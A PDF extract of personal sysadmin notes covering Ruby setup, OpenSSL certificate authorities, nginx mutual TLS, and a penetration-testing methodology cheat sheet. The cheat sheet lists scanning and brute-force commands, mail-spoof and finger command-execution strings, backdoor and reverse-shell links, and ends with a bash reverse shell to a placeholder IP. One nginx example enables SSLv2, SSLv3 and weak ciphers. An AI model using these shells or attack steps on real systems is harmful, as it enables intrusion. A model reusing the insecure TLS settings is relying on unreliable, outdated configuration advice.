Postgres data path is /var/lib/postgresql/data. Redmine data path is /usr/src/redmine, and two important folders within this are files and plugins https://github.com/docker-library/redmine https://github.com/docker-library/redmine/blob/master/3.0/docker-entrypoint.sh https://hub.docker.com/_/redmine/ https://hub.docker.com/_/postgres/ https://hub.docker.com/_/mysql/

45.1. Tips 325 Omid Raha MyStack Documentation, Release 0.1

326 Chapter 45. Redmine CHAPTER 46

Research

Contents:

46.1 Resource

46.1.1 What’s the best server distro ?

Five Reasons to use Debian as a Server Debian vs CentOS Debian Linux Named Most Popular Distro for Web Servers http://distrowatch.com

327 Omid Raha MyStack Documentation, Release 0.1

328 Chapter 46. Research CHAPTER 47

Ruby

Contents:

47.1 Tips

47.1.1 Ruby environment

How to Use rbenv to Manage Multiple Versions of Ruby

$ aptitude install rbenv $ aptitude install ruby-build $ echo 'export PATH="$HOME/.rbenv/bin:$PATH"' >> ~/.bash_profile $ echo 'eval "$(rbenv init -)"' >> ~/.bash_profile $ exec $SHELL -l $ rbenv install1.9.3-p545 $ rbenv rehash $ mkdir ruby_1.9.3-p545 $ cd ruby_1.9.3-p545 $ rbenv local1.9.3-p545 $ ruby -v $ gem install bundler

329 Omid Raha MyStack Documentation, Release 0.1

330 Chapter 47. Ruby CHAPTER 48

Security

Contents:

48.1 Tips

WebAppSec Secure Coding Guidelines Django Secure

48.1.1 List of Secure Email Providers that take Privacy Serious http://freedomhacker.net/list-of-secure-email-providers-that-take-privacy-serious/ • ShazzleMail One of the most secure email providers. • Hushmail.com Canadian based company, really great and respects privacy. The leading provider in secure email. Get %25 off paid plans with code FREEDOMHACKER. • StartMail.com • Lavabit Shut down as of August 2013 (the owner cannot state why, but many reliable sources say whistle blower Edward Snowden was using it, and the court made him shut the service down.) • SilentCircle.com Mail Shut down as of August 2013. All of their other services still work. • TorGuard.net • RiseUp.net Great secure offshore provider. Non profit and fights for digital freedoms. • OpaqueMail.org • Autistici/Inventati • NeoMailBox.com • 4SecureMail.com

331 Omid Raha MyStack Documentation, Release 0.1

• CounterMail.cm • CryptoHeaven.com • S-Mail.com • Securenym.net • Safe-Mail.net • KeptPrivate.com • Novo-Ordo.com • LockBin.com • AES.io • SendINC.com Sends encrypted emails, not actually a provider, but allows full communication through your email but encrypting your email/emails. • Opolis.eu • OneShar.es – Self destructing emails • .ch • MaskMe - Great service, its not a provider, not a throwaway email provider either. Read on their page what they are about. I would recommend using this everyday with Hushmail. • TorMail.org – Service now dead.

48.1.2 How to create your own root key and root certificate

https://jamielinux.com/articles/2013/08/act-as-your-own-certificate-authority/ Copy default /etc/ssl/openssl.cnf sample file to your custom directory:

$ cp /etc/ssl/openssl.cnf ~/my_crt

Ensure that your OpenSSL configuration file (~/my_crt/openssl.cnf) specifies dir=~/my_crt within the [ CA_default ] section.

[ CA_default]

dir= ~/my_crt

The very first cryptographic pair we generate includes what is known as a root certificate. The root key (ca.key.pem) generated in this step should be kept extremely secure, Otherwise an attacker can issue valid certificates for themselves. We’ll therefore protect it with AES 256-bit encryption and a strong password just in case it falls into the wrong hands:

$ openssl genrsa -aes256 -out ca.key.pem 4096 -config ~/my_crt/openssl.cnf

Enter pass phrase for ca.key.pem: secretpassword Verifying - Enter pass phrase for ca.key.pem: secretpassword

332 Chapter 48. Security Omid Raha MyStack Documentation, Release 0.1

Open your OpenSSL configuration file (~/my_crt/openssl.cnf) and look for the [ usr_cert ] and [ v3_ca ] sections. Make sure they contain the following options:

[ usr_cert] # These extensions are added when 'ca' signs a request. basicConstraints=CA:FALSE keyUsage= nonRepudiation, digitalSignature, keyEncipherment nsComment= "OpenSSL Generated Certificate" subjectKeyIdentifier=hash authorityKeyIdentifier=keyid,issuer

[ v3_ca] # Extensions for a typical CA subjectKeyIdentifier=hash authorityKeyIdentifier=keyid:always,issuer basicConstraints= CA:true keyUsage= cRLSign, keyCertSign

Now you can use the root key above to issue a root certificate (ca.cert.pem). In this example, the certificate is set to expire in ten years. As this is a CA certificate, use the v3_ca extension. You will be prompted for some responses, which you can fill with whatever you like. For convenience, defaults can be set in the openssl configuration file. The default digest is SHA-1. SHA-1 is considered insecure. Pass the -sha256 option to use a more secure digest.

$ openssl req -new -x509 -days 365 -key ca.key.pem \ -sha256 -extensions v3_ca -out ca.cert.pem -config ~/my_crt/openssl.cnf

Enter pass phrase for ca.key.pem: You are about to be asked to enter information that will be incorporated into your certificate request. ----- Country Name (2 letter code) [XX]:GB State or Province Name (full name) []:London Locality Name (eg, city) [Default City]:London Organization Name (eg, company) [Default Company Ltd]:Alice CA Organizational Unit Name (eg, section) []: Common Name (eg, your name or your server's hostname) []:Alice CA Email Address []:[email protected]

Armed with your root key (ca.key.pem) and root certificate (ca.cert.pem), you are now ready to optionally create an intermediate certificate authority.

48.1.3 How to generate a certificate signing request (CSR) https://gist.github.com/mtigas/952344

$ openssl genrsa -aes256 -out client.key 4096 -config ~/my_crt/openssl.cnf $ openssl req -new -key client.key -out client.csr

# self-signed $ openssl x509 -req -days 365 -in client.csr -CA ca.cert.pem -CAkey ca.key.pem -set_

˓→serial 01 -out client.crt

48.1. Tips 333 Omid Raha MyStack Documentation, Release 0.1

48.1.4 Convert Client Key to PKCS

$ openssl pkcs12 -export -clcerts -in client.crt -inkey client.key -out client.p12

48.1.5 Mutual Authentication

With des3:

$ openssl genrsa -des3 -out ca.key 4096 $ openssl req -new -x509 -days 365 -key ca.key -out ca.crt $ openssl genrsa -des3 -out server.key 1024 $ openssl req -new -key server.key -out server.csr $ openssl x509 -req -days 365 -in server.csr -CA ca.crt -CAkey ca.key -set_serial 01-

˓→out server.crt $ openssl genrsa -des3 -out client.key 1024 $ openssl req -new -key client.key -out client.csr $ openssl x509 -req -days 365 -in client.csr -CA ca.crt -CAkey ca.key -set_serial 02-

˓→out client.crt $ openssl pkcs12 -export -clcerts -in client.crt -inkey client.key -out client.p12

With aes256 and some more options:

$ openssl genrsa -aes256 -out ca.key 4096 -config openssl.cnf $ openssl req -new -x509 -days 365 -key ca.key -sha256 -extensions v3_ca -out ca.crt -

˓→config openssl.cnf $ openssl genrsa -aes256 -out server.key 4096 -config openssl.cnf $ openssl req -new -key server.key -sha256 -extensions v3_ca -out server.csr -config

˓→openssl.cnf $ openssl x509 -req -days 365 -in server.csr -CA ca.crt -CAkey ca.key -set_serial 01-

˓→out server.crt -sha256 -extfile server_extKey.cnf $ openssl genrsa -aes256 -out client.key 4096 -config openssl.cnf $ openssl req -new -key client.key -sha256 -extensions v3_ca -out client.csr -config

˓→openssl.cnf $ openssl x509 -req -days 365 -in client.csr -CA ca.crt -CAkey ca.key -set_serial 02-

˓→out client.crt -sha256 -extfile client_extKey.cnf $ openssl pkcs12 -export -clcerts -in client.crt -inkey client.key -out client.p12

# client_extKey.cnf extendedKeyUsage= critical, clientAuth keyUsage=critical, digitalSignature, keyEncipherment

# server_extKey.cnf keyUsage=critical, digitalSignature, keyEncipherment

# Verify Server Certificate $ openssl verify -purpose sslserver -CAfile ca.crt server.crt # Verify Client Certificate $ openssl verify -purpose sslclient -CAfile ca.crt client.crt $ curl -v -s -k --key client.key --cert client.crt https://termestudio.com/ server{ server_name localhost; root html; index index.html index.htm; (continues on next page)

334 Chapter 48. Security Omid Raha MyStack Documentation, Release 0.1

(continued from previous page) listen 443; ssl on; ssl_certificate /etc/nginx/certs/server.crt; ssl_certificate_key /etc/nginx/certs/server.key; ssl_client_certificate /etc/nginx/certs/ca.crt; ssl_verify_client on; ssl_verify_depth2; ssl_session_timeout 5m; ssl_protocols SSLv2 SSLv3 TLSv1; ssl_ciphers ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP; ssl_prefer_server_ciphers on; }

# openssl.cnf # # OpenSSL example configuration file. # This is mostly being used for generation of certificate requests. #

# This definition stops the following lines choking if HOME isn't # defined. HOME=. RANDFILE= $ENV::HOME/.rnd

# Extra OBJECT IDENTIFIER info: #oid_file = $ENV::HOME/.oid oid_section= new_oids

# To use this configuration file with the "-extfile" option of the # "openssl x509" utility, name here the section containing the # X.509v3 extensions to use: # extensions = # (Alternatively, use a configuration file that has only # X.509v3 extensions in its main [= default] section.)

[ new_oids]

# We can add new OIDs in here for use by 'ca', 'req' and 'ts'. # Add a simple OID like this: # testoid1=1.2.3.4 # Or use config file substitution like this: # testoid2=${testoid1}.5.6

# Policies used by the TSA examples. tsa_policy1=1.2.3.4.1 tsa_policy2=1.2.3.4.5.6 tsa_policy3=1.2.3.4.5.7

#################################################################### [ ca] default_ca= CA_default # The default ca section

#################################################################### [ CA_default] dir= /home/or/workspace/prj/me/TS/crt # Where everything is kept (continues on next page)

48.1. Tips 335 Omid Raha MyStack Documentation, Release 0.1

(continued from previous page) certs= $dir/certs # Where the issued certs are kept crl_dir= $dir/crl # Where the issued crl are kept database= $dir/index.txt # database index file. #unique_subject = no # Set to 'no' to allow creation of # several ctificates with same subject. new_certs_dir= $dir/newcerts # default place for new certs. certificate= $dir/cacert.pem # The CA certificate serial= $dir/serial # The current serial number crlnumber= $dir/crlnumber # the current crl number # must be commented out to leave a V1 CRL crl= $dir/crl.pem # The current CRL private_key= $dir/private/cakey.pem# The private key RANDFILE= $dir/private/.rand # private random number file x509_extensions= usr_cert # The extentions to add to the cert

# Comment out the following two lines for the "traditional" # (and highly broken) format. name_opt= ca_default # Subject Name options cert_opt= ca_default # Certificate field options

# Extension copying option: use with caution. # copy_extensions = copy

# Extensions to add to a CRL. Note: Netscape communicator chokes on V2 CRLs # so this is commented out by default to leave a V1 CRL. # crlnumber must also be commented out to leave a V1 CRL. # crl_extensions = crl_ext default_days= 365 # how long to certify for default_crl_days= 30 # how long before next CRL default_md= default # use public key default MD preserve= no # keep passed DN ordering

# A few difference way of specifying how similar the request should look # For type CA, the listed attributes must be the same, and the optional # and supplied fields are just that :-) policy= policy_match

# For the CA policy [ policy_match] countryName= match stateOrProvinceName= match organizationName= match organizationalUnitName= optional commonName= supplied emailAddress= optional

# For the 'anything' policy # At this point in time, you must list all acceptable 'object' # types. [ policy_anything] countryName= optional stateOrProvinceName= optional localityName= optional organizationName= optional (continues on next page)

336 Chapter 48. Security Omid Raha MyStack Documentation, Release 0.1

(continued from previous page) organizationalUnitName= optional commonName= supplied emailAddress= optional

#################################################################### [ req] default_bits= 2048 default_keyfile= privkey.pem distinguished_name= req_distinguished_name attributes= req_attributes x509_extensions= v3_ca # The extentions to add to the self signed cert

# Passwords for private keys if not present they will be prompted for # input_password = secret # output_password = secret

# This sets a mask for permitted string types. There are several options. # default: PrintableString, T61String, BMPString. # pkix : PrintableString, BMPString (PKIX recommendation before 2004) # utf8only: only UTF8Strings (PKIX recommendation after 2004). # nombstr : PrintableString, T61String (no BMPStrings or UTF8Strings). # MASK:XXXX a literal mask value. # WARNING: ancient versions of Netscape crash on BMPStrings or UTF8Strings. string_mask= utf8only

# req_extensions = v3_req # The extensions to add to a certificate request

[ req_distinguished_name] countryName= Country Name(2 letter code) countryName_default=AU countryName_min=2 countryName_max=2 stateOrProvinceName= State or Province Name(full name) stateOrProvinceName_default= Some-State localityName= Locality Name(eg, city)

0.organizationName= Organization Name(eg, company) 0.organizationName_default= Internet Widgits Pty Ltd

# we can do this but it is not needed normally :-) #1.organizationName = Second Organization Name (eg, company) #1.organizationName_default = World Wide Web Pty Ltd organizationalUnitName= Organizational Unit Name(eg, section) #organizationalUnitName_default = commonName= Common Name(e.g. server FQDN or YOUR name) commonName_max= 64 emailAddress= Email Address emailAddress_max= 64

# SET-ex3 = SET extension number 3

[ req_attributes] (continues on next page)

48.1. Tips 337 Omid Raha MyStack Documentation, Release 0.1

(continued from previous page) challengePassword= A challenge password challengePassword_min=4 challengePassword_max= 20 unstructuredName= An optional company name

[ usr_cert]

# These extensions are added when 'ca' signs a request.

# This goes against PKIX guidelines but some CAs do it and some software # requires this to avoid interpreting an end user certificate as a CA. basicConstraints=CA:FALSE

# Here are some examples of the usage of nsCertType. If it is omitted # the certificate can be used for anything *except* object signing.

# This is OK for an SSL server. # nsCertType = server

# For an object signing certificate this would be used. # nsCertType = objsign

# For normal client use this is typical # nsCertType = client, email

# and for everything including object signing: # nsCertType = client, email, objsign

# This is typical in keyUsage for a client certificate. keyUsage= nonRepudiation, digitalSignature, keyEncipherment

# This will be displayed in Netscape's comment listbox. nsComment= "OpenSSL Generated Certificate"

# PKIX recommendations harmless if included in all certificates. subjectKeyIdentifier=hash authorityKeyIdentifier=keyid,issuer

# This stuff is for subjectAltName and issuerAltname. # Import the email address. # subjectAltName=email:copy # An alternative to produce certificates that aren't # deprecated according to PKIX. # subjectAltName=email:move

# Copy subject details # issuerAltName=issuer:copy

#nsCaRevocationUrl = http://www.domain.dom/ca-crl.pem #nsBaseUrl #nsRevocationUrl #nsRenewalUrl #nsCaPolicyUrl #nsSslServerName

(continues on next page)

338 Chapter 48. Security Omid Raha MyStack Documentation, Release 0.1

(continued from previous page) # This is required for TSA certificates. extendedKeyUsage= critical,timeStamping

[ v3_req]

# Extensions to add to a certificate request basicConstraints= CA:FALSE keyUsage= nonRepudiation, digitalSignature, keyEncipherment

[ v3_ca]

# Extensions for a typical CA

# PKIX recommendation. subjectKeyIdentifier=hash authorityKeyIdentifier=keyid:always,issuer

# This is what PKIX recommends but some broken software chokes on critical # extensions. basicConstraints= critical,CA:true # So we do this instead. #basicConstraints = CA:true

# Key usage: this is typical for a CA certificate. However since it will # prevent it being used as an test self-signed certificate it is best # left out by default. keyUsage= cRLSign, keyCertSign

# Some might want this also # nsCertType = sslCA, emailCA

# Include email address in subject alt name: another PKIX recommendation # subjectAltName=email:copy # Copy issuer details # issuerAltName=issuer:copy

# DER hex encoding of an extension: beware experts only! # obj=DER:02:03 # Where 'obj' is a standard or added object # You can even override a supported extension: # basicConstraints= critical, DER:30:03:01:01:FF #extendedKeyUsage = critical, clientAuth

[ crl_ext]

# CRL extensions. # Only issuerAltName and authorityKeyIdentifier make any sense in a CRL.

# issuerAltName=issuer:copy authorityKeyIdentifier=keyid:always (continues on next page)

48.1. Tips 339 Omid Raha MyStack Documentation, Release 0.1

(continued from previous page)

[ proxy_cert_ext] # These extensions should be added when creating a proxy certificate

# This goes against PKIX guidelines but some CAs do it and some software # requires this to avoid interpreting an end user certificate as a CA. basicConstraints=CA:FALSE

# Here are some examples of the usage of nsCertType. If it is omitted # the certificate can be used for anything *except* object signing.

# This is OK for an SSL server. # nsCertType = server

# For an object signing certificate this would be used. # nsCertType = objsign

# For normal client use this is typical # nsCertType = client, email

# and for everything including object signing: # nsCertType = client, email, objsign

# This is typical in keyUsage for a client certificate. # keyUsage = nonRepudiation, digitalSignature, keyEncipherment

# This will be displayed in Netscape's comment listbox. nsComment= "OpenSSL Generated Certificate"

# PKIX recommendations harmless if included in all certificates. subjectKeyIdentifier=hash authorityKeyIdentifier=keyid,issuer

# This stuff is for subjectAltName and issuerAltname. # Import the email address. # subjectAltName=email:copy # An alternative to produce certificates that aren't # deprecated according to PKIX. # subjectAltName=email:move

# Copy subject details # issuerAltName=issuer:copy

#nsCaRevocationUrl = http://www.domain.dom/ca-crl.pem #nsBaseUrl #nsRevocationUrl #nsRenewalUrl #nsCaPolicyUrl #nsSslServerName

# This really needs to be in place for it to be a proxy certificate. proxyCertInfo=critical,language:id-ppl-anyLanguage,pathlen:3,policy:foo

#################################################################### [ tsa]

(continues on next page)

340 Chapter 48. Security Omid Raha MyStack Documentation, Release 0.1

(continued from previous page) default_tsa= tsa_config1 # the default TSA section

[ tsa_config1]

# These are used by the TSA reply generation only. dir= ./demoCA # TSA root directory serial= $dir/tsaserial # The current serial number (mandatory) crypto_device= builtin # OpenSSL engine to use for signing signer_cert= $dir/tsacert.pem # The TSA signing certificate # (optional) certs= $dir/cacert.pem # Certificate chain to include in reply # (optional) signer_key= $dir/private/tsakey.pem # The TSA private key (optional)

default_policy= tsa_policy1 # Policy if request did not specify it # (optional) other_policies= tsa_policy2, tsa_policy3 # acceptable policies (optional) digests= md5, sha1 # Acceptable message digests (mandatory) accuracy= secs:1, millisecs:500, microsecs:100 # (optional) clock_precision_digits=0 # number of digits after dot. (optional) ordering= yes # Is ordering defined for timestamps? # (optional, default: no) tsa_name= yes # Must the TSA name be included in the reply? # (optional, default: no) ess_cert_id_chain= no # Must the ESS cert id chain be included? # (optional, default: no)

Note about common name: Common Name (e.g. server FQDN or YOUR name) []:example.local The Common Name option is the most important, as your domain used with the certificate needs to match it. If you use the “www” subdomain, this means specifying the “www” subdomain as well! Note about serial number: This error (Error code: sec_error_reused_issuer_and_serial) occurred in firefox page with this description: Your certificate contains the same serial number as another certificate issued by the certificate authority. Please get a new certificate containing a unique serial number. When serial number for client and CA is the same. Resources: https://www.openssl.org/docs/apps/x509v3_config.html https://tech.mendix.com/linux/2014/10/29/nginx-certs-sni/ https://serversforhackers.com/ssl-certs/ http://stackoverflow.com/questions/1402699/bad-openssl-certificate http://stackoverflow.com/questions/19726138/openssl-error-18-at-0-depth-lookupself-signed-certificate https://github.com/nategood/sleep-tight/blob/master/scripts/create-certs.sh http://stackoverflow.com/questions/20767548/nginx-subdomain-ssl-redirect-redirects-top-level-domain

48.1. Tips 341 Omid Raha MyStack Documentation, Release 0.1

48.1.6 Self Sign Authentication

$ openssl genrsa -out ca.key 4096 $ openssl req -new -x509 -days 365 -key ca.key -out ca.crt $ openssl genrsa -out client.key 4096 $ openssl req -new -key client.key -out client.csr $ openssl x509 -req -days 365 -in client.csr -CA ca.crt -CAkey ca.key -set_serial 01-

˓→out client.crt $ openssl pkcs12 -export -clcerts -in client.crt -inkey client.key -out client.p12 server{

server_name localhost; root html; index index.html index.htm;

listen 443; ssl on; ssl_certificate /etc/nginx/certs/ca.crt; ssl_certificate_key /etc/nginx/certs/ca.key; ssl_client_certificate /etc/nginx/certs/client.crt; ssl_verify_client on;

ssl_session_timeout 5m; ssl_protocols SSLv3 TLSv1 TLSv1.1 TLSv1.2; ssl_ciphers "HIGH:!aNULL:!MD5 or HIGH:!aNULL:!MD5:!3DES"; ssl_prefer_server_ciphers on;

location /{ try_files $uri $uri/=404; } }

Resources: https://gist.github.com/eliangcs/6316574 https://gist.github.com/twined/cfdaa968223c9e293b59

48.1.7 Can I build my own Extended Validation (EV) SSL certificate? http://serverfault.com/questions/48053/can-i-build-my-own-extended-validation-ssl-certificate http://stackoverflow.com/questions/10950014/green-bar-for-self-made-ssl https://www.sslshopper.com/cheapest-ev-ssl-certificates.html http://en.wikipedia.org/wiki/Extended_Validation_Certificate http://stackoverflow.com/questions/8455113/firefox-ssl-you-are-connected-to-whatever-com-which-is-run-by-unknown

48.1.8 Using shadowsocks https://github.com/shadowsocks/shadowsocks https://xuri.me/2014/08/14/shadowsocks-setup-guide.html

342 Chapter 48. Security Omid Raha MyStack Documentation, Release 0.1

48.1.9 JSON Web Token

JSON Web Token is a fairly new standard which can be used for token-based authentication. Unlike the built-in TokenAuthentication scheme, JWT Authentication doesn’t need to use a database to validate a token. http://www.django-rest-framework.org/api-guide/authentication/#json-web-token-authentication JWT (Json web token) Vs Custom Token http://stackoverflow.com/a/31737111 http://getblimp.github.io/django-rest-framework-jwt/ https://jwt.io/introduction/

48.2 Links

48.2.1 Password list https://wiki.skullsecurity.org/Passwords https://dazzlepod.com/uniqpass/

48.2.2 XSS https://www.owasp.org/index.php/Cross-site_Scripting_%28XSS%29 http://htmlpurifier.org/live/smoketests/xssAttacks.php

48.2.3 Online exploit search https://exploits.shodan.io/welcome

48.2.4 Search engine for Internet-connected device https://www.shodan.io/

48.3 Penetration

48.3.1 Penetration testing methodology http://www.0daysecurity.com/penetration-testing/penetration.html • Discovery & Probing • Enumeration • Network Footprinting • Password Cracking • Voip Security • Vulnerability Assesment

48.2. Links 343 Omid Raha MyStack Documentation, Release 0.1

• Wireless Penetration • General Penetration Discovery & Probing Discovery & Probing. Enumeration can serve two distinct purposes in an assessment: OS Fingerprinting Remote applications being served. OS fingerprinting or TCP/IP stack fingerprinting is the process of determining the operating system being utilised on a remote host. This is carried out by analyzing packets received from the host in question. There are two distinct ways to OS fingerprint, actively (i.e. nmap) or passively (i.e. scanrand). Passive OS fingerprinting determines the remote OS utilising the packets received only and does not require any packets to be sent. Active OS fingerprinting is very noisy and requires packets to be sent to the remote host and waits for a reply, (or lack thereof). Disparate OS’s respond differently to certain types of packet, (the response is governed by an RFC and any proprietary responses the vendor (notably Microsoft) has enabled within the system) and so custom packets may be sent. Remote applications being served on a host can be determined by an open port on that host. By port scanning it is then possible to build up a picture of what applications are running and tailor the test accordingly.

Default Port Lists Windows *nix Enumeration tools and techniques - The vast majority can be used generically, however, certain bespoke application require there own specific toolsets to be used. Default passwords are platform and vendor specific

General Enumeration Tools nmap nmap -n -A -PN -p- -T Agressive -iL nmap.targetlist -oX nmap.syn.results.xml nmap -sU -PN -v -O -p 1-30000 -T polite -iL nmap.targetlist > nmap.udp.results nmap -sV -PN -v -p 21,22,23,25,53,80,443,161 -iL nmap.targets > nmap.version.results nmap -A -sS -PN -n –script:all ip_address –reason grep “appears to be up” nmap_saved_filename | awk -F( ‘{print $2}’ | awk -F) ‘{print $1}’ > ip_list netcat nc -v -n IP_Address port nc -v -w 2 -z IP_Address port_range/port_number amap amap -bqv 192.168.1.1 80 amap [-A|-B|-P|-W] [-1buSRHUdqv] [[-m] -o <file>] [-D <file>] [-t/-T sec] [-c cons] [-C retries] [-p proto] [-i <file>] [target port [port] . . . ] xprobe2 xprobe2 192.168.1.1 sinfp ./sinfp.pl -i -p nbtscan nbtscan [-v] [-d] [-e] [-l] [-t timeout] [-b bandwidth] [-r] [-q] [-s separator] [-m retransmits] (-f filename) | () hping hping ip_address scanrand scanrand ip_address:all unicornscan unicornscan [options ‘b:B:d:De:EFhi:L:m:M:pP:q:r:R:s:St:T:w:W:vVZ:’ ] IP_ADDRESS/ CIDR_NET_MASK: S-E netenum netenum network/netmask timeout fping fping -a -d hostname/ (Network/Subnet_Mask) Firewall Specific Tools firewalk firewalk -p [protocol] -d [destination_port] -s [source_port] [internal_IP] [gate- way_IP] ftester host 1 ./ftestd -i eth0 -v host 2 ./ftest -f ftest.conf -v -d 0.01 then ./freport ftest.log ftestd.log Active Hosts Open TCP Ports Closed TCP Ports Open UDP Ports Closed UDP Ports Service Prob- ing SMTP Mail Bouncing Banner Grabbing Other HTTP Commands JUNK / HTTP/1.0 HEAD / HTTP/9.3 OPTIONS / HTTP/1.0 HEAD / HTTP/1.0 Extensions WebDAV ASP.NET Frontpage OWA IIS ISAPI PHP OpenSSL HTTPS Use to encapsulate traffic.

344 Chapter 48. Security Omid Raha MyStack Documentation, Release 0.1

SMTP POP3 FTP If banner altered, attempt anon logon and execute: ‘quote help’ and ‘syst’ commands. ICMP Responses Type 3 (Port Unreachable) Type 8 (Echo Request) Type 13 (Timestamp Re- quest) Type 15 (Information Request) Type 17 (Subnet Address Mask Request) Responses from broadcast address Source Port Scans TCP/UDP 53 (DNS) TCP 20 (FTP Data) TCP 80 (HTTP) TCP/UDP 88 (Kerberos) Firewall Assessment Firewalk TCP/UDP/ICMP responses OS Fingerprint Enumeration FTP port 21 open Fingerprint server telnet ip_address 21 (Banner grab) Run command ftp ip_address [email protected] Check for anonymous access ftp ip_addressUsername: anonymous OR anonPassword: [email protected] Password guessing Hydra brute force medusa Brutus Examine configuration files ftpusers ftp.conf proftpd.conf MiTM pasvagg.pl SSH port 22 open Fingerprint server telnet ip_address 22 (banner grab) scanssh scanssh -p -r -e excludes random(no.)/Network_ID/Subnet_Mask Password guessing ssh root@ip_address guess-who ./b -l username -h ip_address -p 22 -2 < password_file_location Hydra brute force brutessh Ruby SSH Bruteforcer Examine configuration files ssh_config sshd_config authorized_keys ssh_known_hosts .shosts SSH Client programs tunnelier winsshd Telnet port 23 open Fingerprint server telnet ip_address Common Banner ListOS/BannerSolaris 8/SunOS 5.8Solaris 2.6/SunOS 5.6Solaris 2.4 or 2.5.1/Unix(r) System V Release 4.0 (hostname)SunOS 4.1.x/SunOS Unix (hostname)FreeBSD/FreeBSD/ (hostname) (ttyp1)NetBSD/NetBSD/i386 (hostname) (ttyp1)OpenBSD/OpenBSD/i386 (hostname) (ttyp1)Red Hat 8.0/Red Hat Linux release 8.0 (Psyche)Debian 3.0/Debian GNU/Linux 3.0 / hostnameSGI IRIX 6.x/IRIX (hostname)IBM AIX 4.1.x/AIX Version 4 (C) Copyrights by IBM and by others 1982, 1994.IBM AIX 4.2.x or 4.3.x/AIX Version 4 (C) Copyrights by IBM and by others 1982, 1996. IPSO/IPSO (hostname) (ttyp0)Cisco IOS/User Access VerificationLivingston ComOS/ComOS - Livingston PortMaster telnetfp Password Attack Common passwords Hydra brute force Brutus telnet -l “-froot” hostname (Solaris 10+)

48.3. Penetration 345 Omid Raha MyStack Documentation, Release 0.1

Examine configuration files /etc/inetd.conf /etc/xinetd.d/telnet /etc/xinetd.d/stelnet Sendmail Port 25 open Fingerprint server telnet ip_address 25 (banner grab) Mail Server Testing Enumerate users VRFY username (verifies if username exists - enumeration of accounts) EXPN username (verifies if username is valid - enumeration of accounts) Mail Spoof Test HELO anything MAIL FROM: spoofed_address RCPT TO:valid_mail_account DATA . QUIT Mail Relay Test HELO anything Identical to/from - mail from: rcpt to: Unknown domain - mail from: Do- main not present - mail from: Domain not supplied - mail from: Source address omission - mail from: <> rcpt to: Use IP address of target server - mail from: rcpt to: Use double quotes - mail from: rcpt to: <”user@recipent- domain”> User IP address of the target server - mail from: rcpt to: Disparate formatting - mail from: rcpt to: <@do- main:nobody@recipient-domain> Disparate formatting2 - mail from: rcpt to: Examine Configuration Files sendmail.cf submit.cf DNS port 53 open Fingerprint server/ service host host [-aCdlnrTwv ] [-c class ] [-N ndots ] [-R number ] [-t type ] [-W wait ] name [server ] -v verbose format -t (query type) Allows a user to specify a record type i.e. A, NS, or PTR. -a Same as –t ANY. -l Zone transfer (if allowed). -f Save to a specified filename. nslookup nslookup [ -option . . . ] [ host-to-find | - [ server ]] dig dig [ @server ] [-b address ] [-c class ] [-f filename ] [-k filename ] [-p port# ] [-t type ] [-x addr ] [-y name:key ] [-4 ] [-6 ] [name ] [type ] [class ] [queryopt. . . ] whois-h Use the named host to resolve the query -a Use ARIN to resolve the query -r Use RIPE to resolve the query -p Use APNIC to resolve the query -Q Perform a quick lookup DNS Enumeration Bile Suite perl BiLE.pl [website] [project_name] perl BiLE-weigh.pl [website] [input file] perl vet-IPrange.pl [input file] [true domain file] [output file] perl vet-mx.pl [in- put file] [true domain file] [output file] perl exp-tld.pl [input file] [output file] perl jarf- dnsbrute [domain_name] (brutelevel) [file_with_names] perl qtrace.pl [ip_address_file] [output_file] perl jarf-rev [subnetblock] [nameserver] txdns txdns -rt -t domain_name txdns -x 50 -bb domain_name txdns –verbose -fm wordlist.dic –server ip_address -rr SOA domain_name -h c: hostlist.txt

346 Chapter 48. Security Omid Raha MyStack Documentation, Release 0.1

Examine Configuration Files host.conf resolv.conf named.conf TFTP port 69 open TFTP Enumeration tftp ip_address PUT local_file tftp ip_address GET conf.txt (or other files) Solarwinds TFTP server tftp – i GET /etc/passwd (old Solaris) TFTP Bruteforcing TFTP bruteforcer Cisco-Torch Finger Port 79 open User enumeration finger ‘a b c d e f g h’ @example.com finger [email protected] finger [email protected] finger [email protected] finger [email protected] finger **@example.com finger [email protected] finger @example.com Command execution finger “|/bin/[email protected]" finger "|/bin/ls -a /@example.com” Finger Bounce finger user@host@victim finger @internal@external Web Ports 80, 8080 etc. open Fingerprint server Telnet ip_address port Firefox plugins All firecat Specific add n edit cookies asnumber header spy live http headers shazou web de- veloper Crawl website lynx [options] startfile/URL Options include -traversal -crawl -dump -image_links -source httprint Metagoofil metagoofil.py -d [domain] -l [no. of] -f [type] -o results.html Web Directory enumeration Nikto nikto [-h target] [options] DirBuster Wikto Goolag Scanner Vulnerability Assessment Manual Tests Default Passwords Install Backdoors ASP http://packetstormsecurity.org/UNIX/penetration/aspxshell.aspx.txt Assorted http://michaeldaw.org/projects/web-backdoor-compilation/ http://open-labs.org/hacker_webkit02.tar.gz Perl http://home.arcor.de/mschierlm/test/pmsh.pl http://pentestmonkey.net/ tools/perl-reverse-shell/ http://freeworld.thc.org/download.php?t=r&f= rwwwshell-2.0.pl.gz PHP http://php.spb.ru/remview/ http://pentestmonkey.net/tools/ php-reverse-shell/ http://pentestmonkey.net/tools/php-findsock-shell/ Python http://matahari.sourceforge.net/ TCL http://www.irmplc.com/download_pdf.php?src=Creating_Backdoors_in_ Cisco_IOS_using_Tcl.pdf&force=yes Bash Connect Back Shell GnuCitizen Atttack Box: nc -l -p Port -vvv Victim: $ exec 5<>/dev/tcp/IP_Address/Port Victim: $ cat <&5 | while read line; do $line 2>&5 >&5; done

48.3. Penetration 347 Omid Raha MyStack Documentation, Release 0.1

